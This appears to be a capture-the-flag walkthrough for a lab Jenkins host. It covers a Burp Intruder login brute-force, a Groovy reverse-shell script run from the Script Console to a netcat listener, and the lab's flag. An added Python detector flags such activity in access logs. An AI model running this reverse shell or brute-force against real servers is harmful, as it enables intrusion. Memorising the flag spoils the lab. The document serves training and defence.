Pennyworth

Task 1: What does the acronym CVE stand for?

  • Common Vulnerabilities and Exposures

Task 2: What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?

  • Confidentiality, Integrity, Availability

Task 3: What is the version of the service running on port 8080?

  • Run the following nmap command:

nmap -sV -p 8080 [Target IP]
  • The answer is Jetty 9.4.39.v20210325

Task 4: What version of Jenkins is running on the target?

  • Start by going to your web browser and typing in http://[Target IP]:8080

  • At the login page, the source code does not tell us anything useful

  • Try some default passwords. Nothing usual works.

  • Run the login request through Intruder in Burp Suite to guess the username and password

  • This shows that root:password is a valid login

  • In the bottom right-hand corner of the admin page is the Jenkins version: 2.289.1

Task 5: What type of script is accepted as input on the Jenkins Script Console?

  • On the first admin page, it states Groovy Script

Task 6: What would the "String cmd" variable from the Groovy Script snippet be equal to if the Target VM was running Windows?

  • I believe they are asking what the CLI is for Windows:

  • cmd.exe

Task 7: What is a different command than "ip a" we could use to display our network interfaces' information on Linux?

  • On Linux, a similar command would be:

  • ifconfig

Task 8: What switch should we use with netcat for it to use UDP transport mode?

  • Quick help search on netcat shows:

    • The answer is -u

Task 9: What is the term used to describe making a target host initiate a connection back to the attacker host?

  • I just know this as "reverse shell"

Capture the Flag:

  • Start a netcat listener on the host machine:

nc -lvnp 4444
  • In the "Script Console", run the following script from the GitHub link below to make a reverse shell connection back to the host machine.

String host="HOST_IP";
int port=4444;
String cmd="/bin/bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
  • The flag is located in /root/flag.txt

  • The flag is "9cdfb439c7876e703e307864c9167a15"
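
From the defender's side, the path taken in this walkthrough (repeated login failures followed by a POST to the Script Console) is visible in a web access log. The following is an added detection example, not part of the original writeup. It assumes combined-format access logs from a proxy in front of Jenkins and that failed logins redirect to /loginError. The log lines, IP addresses and threshold are constructed.

```python
import re
from collections import defaultdict

# Combined log format: ip ident user [time] "METHOD path PROTO" status size
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
FAIL_PATH = "/loginError"                   # assumed landing page after a failed login
CONSOLE_PATHS = ("/script", "/scriptText")  # Jenkins Script Console endpoints

def analyze(log_text, threshold=5):
    """Return (ip, finding) tuples in the order they appear in the log."""
    failures = defaultdict(int)
    flagged = set()
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method, url, _status = m.groups()
        path = url.split("?", 1)[0].rstrip("/") or "/"
        if path == FAIL_PATH:
            failures[ip] += 1
            if failures[ip] == threshold:  # report each source once
                flagged.add(ip)
                findings.append((ip, "brute-force"))
        elif method == "POST" and path in CONSOLE_PATHS:
            # Script execution by a source that just guessed its way in
            # deserves a higher severity than routine admin use.
            kind = "console-after-brute-force" if ip in flagged else "console-use"
            findings.append((ip, kind))
    return findings

def _line(ip, method, path, status):
    return f'{ip} - - [01/Jan/2024:10:00:00 +0000] "{method} {path} HTTP/1.1" {status} 0'

# Constructed sample: six failed logins from one source, then console use.
SAMPLE = "\n".join(
    [_line("198.51.100.7", "POST", "/j_spring_security_check", 302),
     _line("198.51.100.7", "GET", "/loginError", 200)] * 6
    + [_line("192.0.2.10", "GET", "/loginError", 200),
       _line("192.0.2.10", "POST", "/script", 200),
       _line("198.51.100.7", "POST", "/j_spring_security_check", 302),
       _line("198.51.100.7", "POST", "/script", 200)]
)

if __name__ == "__main__":
    for finding in analyze(SAMPLE):
        print(finding)
```
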
